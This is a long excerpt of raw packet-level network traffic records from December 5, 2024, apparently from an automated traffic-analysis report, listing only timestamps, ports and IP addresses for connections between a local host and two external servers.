                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.122590065 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.123065948 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.123101950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.123774052 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.123811960 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.123903990 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.123936892 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.124924898 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.124963999 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.125034094 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.125072956 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.126096010 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.126229048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.126274109 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.127196074 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.127244949 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.127273083 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.127340078 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.128516912 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.128568888 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.128587008 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.128624916 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.129554987 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.129609108 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.129858971 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.129951954 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.130661964 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.130713940 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.130872965 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.131114006 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.131851912 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.131905079 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.131936073 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.132153034 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.133014917 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.133070946 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.133524895 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.134185076 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.134205103 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.134221077 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.134347916 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.134387970 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.135327101 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.135373116 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.135396004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.135435104 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.136459112 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.136507034 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.136760950 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.136812925 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.137655020 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.137705088 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.137904882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.137948990 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.138771057 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.138822079 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.139388084 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.139436960 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.139902115 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.139960051 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.140233040 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.140276909 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.141073942 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.141128063 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.141490936 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.141544104 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.142306089 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.142355919 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.142460108 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.142503977 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.143384933 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.143445969 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.143557072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.143609047 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.144623041 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.144675970 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.144680977 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.144720078 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.145701885 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.145756006 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.145950079 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.146017075 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.146833897 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.146887064 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.146987915 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.147130966 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.148224115 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.148272038 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.148457050 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.148502111 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.149372101 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.149420977 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.149732113 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.149777889 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.150321007 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.150366068 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.150367975 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.150405884 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.151492119 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.151539087 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.151623964 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.151664019 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.152677059 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.152729034 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.153388023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.153440952 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.153822899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.153836012 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.153876066 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.153888941 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.154936075 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.154993057 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.155049086 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.155088902 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.156097889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.156148911 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.156606913 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.156651020 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.157269955 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.157316923 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.158260107 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.158308983 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.158384085 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.158427000 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.158572912 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.158617020 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.159606934 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.159657001 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.159692049 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.159734011 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.160684109 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.160738945 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.160911083 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.160953999 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.161902905 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.161952972 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.161972046 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.162014008 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.163002014 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.163023949 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.163048983 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.163064003 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.164208889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.164261103 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.164979935 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.165025949 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.165324926 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.165370941 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.165839911 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.165885925 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.166502953 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.166549921 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.166620970 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.166665077 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.167781115 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.167829037 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.167859077 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.167901993 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175364971 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175384045 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175395966 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175406933 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175419092 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175431967 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175446033 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175451994 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175458908 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175488949 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.175513983 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.194739103 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.194808006 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.194910049 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.195252895 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.195667982 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.195729971 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.196397066 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.196767092 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.196890116 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.196918964 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.198003054 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.198092937 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.198133945 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.199038982 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.199095011 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.199177980 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.200203896 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.200253010 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.201062918 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.201414108 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.201426983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.201473951 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.202510118 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.202560902 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.202771902 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.203730106 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.203778028 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.203839064 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.205466986 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.205634117 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.205811024 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.206276894 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.206302881 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.206321001 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.207180977 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.207241058 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.207675934 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.208169937 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.208220959 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.208354950 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.209353924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.209419012 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.209815979 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.210510015 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.210589886 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.210798025 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.211680889 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.211729050 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.211987019 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.212846041 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.212896109 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.213629007 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.214020967 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.214070082 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.214247942 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.215195894 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.215261936 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.215322018 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.216233015 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.216299057 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.216494083 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.217269897 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.217361927 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.218144894 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.218473911 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.218487024 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.218538046 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.219531059 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.219628096 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.220155001 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.220948935 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.221004963 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.221815109 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.222168922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.222181082 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.222259998 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.222975969 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.223031998 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.223464966 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.224122047 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.224200010 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.224442005 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.225243092 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.225312948 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.225507975 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.226358891 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.226424932 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.226707935 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.227540016 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.227602959 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.227721930 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.228717089 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.228760958 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.229368925 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.229813099 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.229859114 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.229979038 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.230921984 CET51884979292.255.85.66192.168.2.11
